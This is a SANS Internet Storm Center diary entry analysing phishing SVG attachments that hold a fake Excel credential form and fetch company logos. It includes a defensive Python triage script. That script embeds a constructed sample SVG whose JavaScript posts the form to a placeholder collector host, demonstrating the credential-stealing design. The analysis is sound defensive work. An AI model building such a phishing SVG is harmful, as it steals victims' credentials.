Increase In Phishing SVG Attachments (Thu, Nov 21st)


There is an increase in SVG attachments used in phishing emails (Scalable Vector Graphics, an XML-based vector image format).

I took a look at some of the samples mentioned in the Bleeping Computer article, and searched for more samples on VirusTotal.

These samples contain HTML & JavaScript code to display a blurry Excel PNG image, and a phishing form asking for credentials. Like this one:

It contains 3 PNG files as data URIs, which can easily be extracted with base64dump.py:

You have the blurry Excel PNG:

An Excel logo:

And a Microsoft logo:

I made some small changes to the sample, so that it would display an example.com email address, instead of a real victim's address that I would have to redact. The email address is hardcoded in BASE64 in the SVG file.

Here I made another example, using a SANS email address:

Do you see a difference, besides the SANS email address?

The SANS logo appears in the form!

Where did that logo come from? It's not embedded in the SVG file!

That logo is retrieved using a web service: logo[.]clearbit[.]com.

As an example, here is the retrieval of the Wikipedia logo:

Here are the URLs in this SVG file:

There's JavaScript code inside this SVG file to make a web request and display the appropriate logo (or the embedded Microsoft logo, if the service doesn't provide a logo).

And the last URL you see in this screenshot is where the form data will be posted (the phished credentials).

That one is the most prevalent in the samples I got from VirusTotal, but there are some other ones:
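To show the triage described above in code (pulling the data-URI images out, decoding the hardcoded base64 address, and listing the cleartext URLs including the logo lookup and the post target), here is a small Python script added as an example; it is not base64dump.py and not code from the samples. The SVG it parses is constructed, and its domains are placeholders.

```python
import base64
import re

# Constructed sample, not a real attachment: an SVG with the building blocks the
# diary describes (data-URI PNG, base64 victim address, logo lookup, form post).
SAMPLE_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image xlink:href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg=="/>
<foreignObject><form id="f"><input name="password"/></form></foreignObject>
<script><![CDATA[
var victim = atob("dXNlckBleGFtcGxlLmNvbQ==");
fetch("https://logo-service.example/" + victim.split("@")[1]);
document.getElementById("f").action = "https://collector.example/post.php";
]]></script>
</svg>"""

DATA_URI_RE = re.compile(rb"data:([\w/+.-]+);base64,([A-Za-z0-9+/=]+)")
URL_RE = re.compile(rb"""https?://[^\s"'<>)]+""")
B64_RE = re.compile(rb"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{16,}={0,2}(?![A-Za-z0-9+/=])")


def extract_data_uris(svg):
    """(mime, decoded bytes, is_png) for every base64 data URI in the file."""
    out = []
    for mime, b64 in DATA_URI_RE.findall(svg):
        blob = base64.b64decode(b64)
        out.append((mime.decode(), blob, blob.startswith(b"\x89PNG\r\n\x1a\n")))
    return out


def extract_urls(svg):
    """Cleartext URLs (logo lookup, credential collector); XML namespace URIs are noise."""
    urls = {u.decode() for u in URL_RE.findall(svg)}
    return sorted(u for u in urls if not u.startswith("http://www.w3.org/"))


def decode_base64_strings(svg):
    """Standalone base64 runs that decode to printable ASCII (e.g. the victim address).
    Data URIs are removed first so image bodies are not reported."""
    found = []
    for m in B64_RE.findall(DATA_URI_RE.sub(b"", svg)):
        try:
            dec = base64.b64decode(m, validate=True)
        except ValueError:  # binascii.Error is a ValueError: bad length or padding
            continue
        if dec and all(32 <= c < 127 for c in dec):
            found.append(dec.decode("ascii"))
    return found


def triage(svg):
    low = svg.lower()
    return {"has_script": b"<script" in low, "has_form": b"<form" in low,
            "images": [(m, len(b), png) for m, b, png in extract_data_uris(svg)],
            "urls": extract_urls(svg), "decoded_strings": decode_base64_strings(svg)}
```

Run `triage()` over a suspicious attachment: a `<script>` or `<form>` inside an image file, an email address hiding in base64, and a non-image URL are each a reason to treat it as phishing rather than artwork.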

And I have one sample with heavily obfuscated JavaScript, without cleartext URLs. I'll keep that one for another diary entry …


Didier Stevens
Senior handler
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
